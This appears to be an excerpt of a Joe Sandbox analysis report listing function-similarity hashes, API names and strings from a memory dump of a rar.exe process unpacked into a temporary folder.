Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 1557788787-0
• Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction ID: f709fa76138c355a0bd770d5ce9d52c0f28ceac6500c2700f8732c9e9ae6bf53
• Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction Fuzzy Hash: 55218832E1875181EB208F12E44022966A4FF68FD0F0A4139EE4DA7BD8DF7ED861C309
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CurrentPriorityThread$ClassProcess
• String ID:
• API String ID: 1171435874-0
• Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
• Instruction ID: 9063dae6a3ffdef892b3a76d0cdaba80333977a596f46451fdc2068ec6bf0475
• Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
• Instruction Fuzzy Hash: E5117333A2864287EF508710D48437C2652EBA4741F220434E70D876C4EFBEB865D70A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ErrorLast$abort
• String ID:
• API String ID: 1447195878-0
• Opcode ID: d4ad33f7b583c9827c365d3e4a5a8ce69c30b5c763285f1b20db24e5820a7030
• Instruction ID: aac2713fb28ffb717d9d35cdcfe15d97383debe24b5ee16d97c1d61a82065488
• Opcode Fuzzy Hash: d4ad33f7b583c9827c365d3e4a5a8ce69c30b5c763285f1b20db24e5820a7030
• Instruction Fuzzy Hash: C901C422F0D75202FF58A330E15533811914F68B80F030538F91E867DAEDAFE461C61A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 502429940-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction ID: eec3a417385e5acabc125f9c9630eaf3aa10365c6e14817045af7af5387c24d7
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction Fuzzy Hash: B6118233614A41D7EB149B20E54476AA331FB967A1F000231EBAD532E5CF7AE475C749
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
• Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction ID: ed66f27e7e678412c60ae7ad0ada4b8097419092b0540c8d45ba6cf61f3d8b56
• Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction Fuzzy Hash: 9D914563B19B9646EF108F29D1803686B95EF317D0F068131EA8D87391DE7FE122C316
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF6EE77B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6EE74CBED,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE77B730
• new.LIBCMT ref: 00007FF6EE76CFD9
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Sleep
• String ID: rar$rev
• API String ID: 3472027048-2145959568
• Opcode ID: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
• Instruction ID: ef1a669e128a4ae1f9d27e1d38f33c64e4f2ce93bf13f6b97563184a6fbe63ee
• Opcode Fuzzy Hash: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
• Instruction Fuzzy Hash: 83A1C123A2864382EF14EB20C4543BE6365FB64788F474031EB5D876D5EFAEE564C34A
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *
• API String ID: 3215553584-163128923
• Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction ID: 08715bdb157d5d602bce82c5c73f33635dc98bf2cda34356000164f8391ae6f1
• Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction Fuzzy Hash: 9C71537390866985EF688F24C04523C37A1FB75F58F261136EA4AC2294DFBAD4A1C71F
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: e+000$gfff
• API String ID: 3215553584-3030954782
• Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
• Instruction ID: cbc8bb4a830eb3057b67eab3ef8b587e10b34a90a7925753e6913bdd3bb0b4bd
• Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
• Instruction Fuzzy Hash: DF514B63B28BD246EB258B35D8403697B91EB60B90F0A8231E69CCBBC5DF6FD050C715
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6EE75475B,?,00000000,?,?,00007FF6EE754620,?,00000000,?), ref: 00007FF6EE764633
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 1611563598-253988292
• Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction ID: 86cee7fe517054ae39642589992c0dfef6b03da36240141a314a6c6710879f98
• Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction Fuzzy Hash: D141CC03A1868340EF606751D4013B963A1BF657C8F438131FD9DC76DAFEADE5A4D60A
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
• API String ID: 3307058713-4140927169
• Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction ID: 6420e24dc9fabf44c4295cdcce30b22f410fd9e9d1b500086217787666b39ee8
• Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction Fuzzy Hash: 5A41BD37A08A5295EF14DF29E4802B866A4EF55B84B074031FD0D87B95DFBFE4A1C30A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AttributesFilewcsstr
• String ID: System Volume Information\
• API String ID: 1592324571-4227249723
• Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
• Instruction ID: e5f5e973b2ef28b6e79d6c7bb3d1d452500397f1bc1470ca6bcee00bff7779e3
• Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
• Instruction Fuzzy Hash: FA312323A1968245FF509B21E1503BA27A4EF65BC1F464030FE8D97796DEBEE061C70A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: LoadString$fflushswprintf
• String ID: %d.%02d$[
• API String ID: 1946543793-195111373
• Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
• Instruction ID: 9a7c9ffc114891d8cddeabfa0fcf215faed7dff444e39199512e5bc5bf003a99
• Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
• Instruction Fuzzy Hash: 1E31C413A095C651FF60EB14E0053B92391EF64744F46003AF64D876C6EFBEE4A6CB0A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: snprintf
• String ID: $%s$@%s
• API String ID: 4288800496-834177443
• Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
• Instruction ID: 714182730347ff8aeb3dda19f24575860b2b387bcd96d1f433a78b8dae35e0d5
• Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
• Instruction Fuzzy Hash: 9131CB23A18A82A5EF108B55E4407BA2360FB64788F420032FE4D97BD9DE7EE535C709
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: fixed%u.$fixed.
• API String ID: 233258989-2525383582
• Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
• Instruction ID: a699df3e983df6946d93ca39975805492527ee5c7e522a1da1893645a64df80e
• Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
• Instruction Fuzzy Hash: A031E623A1C68252FF10DF25E4003E97360FB64384F910132FA8D87A9ADE7ED556CB05
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                      • String ID: Adding %-58s
                                                                                                                                                                      • API String ID: 2948472770-2059140559
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: swprintf
• String ID: ;%%0%du
• API String ID: 233258989-2249936285
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: ErrorExceptionLastObjectSingleThrowWait
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 564652978-2248577382
Uniqueness

Uniqueness Score: -1.00%